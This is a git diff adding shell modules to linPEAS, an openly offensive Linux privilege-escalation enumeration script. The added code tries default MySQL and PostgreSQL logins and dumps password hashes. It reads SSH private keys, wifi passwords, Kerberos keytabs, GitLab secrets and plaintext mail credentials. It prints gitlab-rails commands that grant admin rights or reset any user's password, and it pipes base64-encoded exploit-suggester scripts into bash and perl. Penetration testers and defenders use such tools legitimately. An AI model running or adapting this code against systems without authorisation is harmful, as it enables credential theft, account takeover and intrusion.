+#--------) Software Information (---------# +########################################### + +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" + +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... " +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" + +peass{MariaDB} + +peass{PostgreSQL} + +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + +peass{Mongo} + +peass{Apache} + +peass{Tomcat} + +peass{FastCGI} + +peass{Http_conf} + +peass{Htpasswd} + +peass{PHP Sessions} + +peass{Wordpress} + +peass{Drupal} + +peass{Moodle} + +peass{Supervisord} + +peass{Cesi} + +peass{Rsync} + +peass{Hostapd} + +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" + +peass{Anaconda ks} + +peass{VNC} + +peass{Ldap} + +peass{OpenVPN} + +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" + +peass{SSH} + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" + +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- SI) NFS exports +print_2title "NFS exports?" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + fi + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" + +peass{Knockd} + +peass{Kibana} + +peass{Elasticsearch} + +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" + +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" + +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +print_2title "Searching AD cached hashes" +if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null +else echo_not_found "cached hashes" +fi +echo "" + +#-- SI) Screen sessions +print_2title "Searching screen sessions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +screensess=$(screen -ls 2>/dev/null) +if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else echo_not_found "screen" +fi +echo "" + +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +print_2title "Searching tmux sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" + +peass{CouchDB} + +peass{Redis} + +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" + +peass{Mosquitto} + +peass{Neo4j} + +peass{Cloud Credentials} + +peass{Cloud Init} + +peass{CloudFlare} + +peass{Erlang} + +peass{GMV Auth} + +peass{IPSec} + +peass{IRSSI} + +peass{Keyring} + +peass{Filezilla} + +peass{Backup Manager} + +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," + fi +done +echo "" + +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + +peass{Github} + +peass{Svn} + +peass{PGP-GPG} + +peass{Cache Vi} + +peass{Wget} + +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi +done +echo "" + +peass{Firefox} + +peass{Chrome} + +peass{Autologin} + +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi +fi +echo "" + +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" + + + +peass{SNMP} + +peass{Pypirc} + +peass{Postfix} + +peass{Ldaprc} + +peass{Env} + +peass{Msmtprc} + +peass{Keepass} + +peass{FTP} + +peass{EXTRA_SECTIONS} + +peass{Interesting logs} + +peass{Windows Files} + +peass{Other Interesting Files} diff --git a/linPEAS/builder/linpeas_parts/system_information.sh b/linPEAS/builder/linpeas_parts/system_information.sh new file mode 100644 index 0000000..4967d6a --- /dev/null +++ b/linPEAS/builder/linpeas_parts/system_information.sh @@ -0,0 +1,185 @@ +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then +warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +print_2title "USBCreator" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" +if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then +pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") +if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) +fi +if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi +fi +fi +echo "" + +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" + +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" + +#-- SY) System stats +print_2title "System stats" +(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" +warn_exec free 2>/dev/null +echo "" + +#-- SY) CPU info +print_2title "CPU info" +warn_exec lscpu 2>/dev/null +echo "" + +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" + +#-- SY) Dmesg +print_2title "Searching Signature verification failed in dmseg" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" +(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" +echo "" + +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions +fi + +if [ "$(command -v bash 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester" + print_info "https://github.com/mzet-/linux-exploit-suggester" + les_b64="peass{LES}" + echo $les_b64 | base64 -d | bash + echo "" +fi + +if [ "$(command -v perl 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester 2" + print_info "https://github.com/jondonas/linux-exploit-suggester-2" + les2_b64="peass{LES2}" + echo $les2_b64 | base64 -d | perl + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Doctor Suggestions" + brew doctor + echo "" +fi + + + +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then + ls -d /etc/apparmor* +else + echo_not_found "AppArmor" +fi + +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed 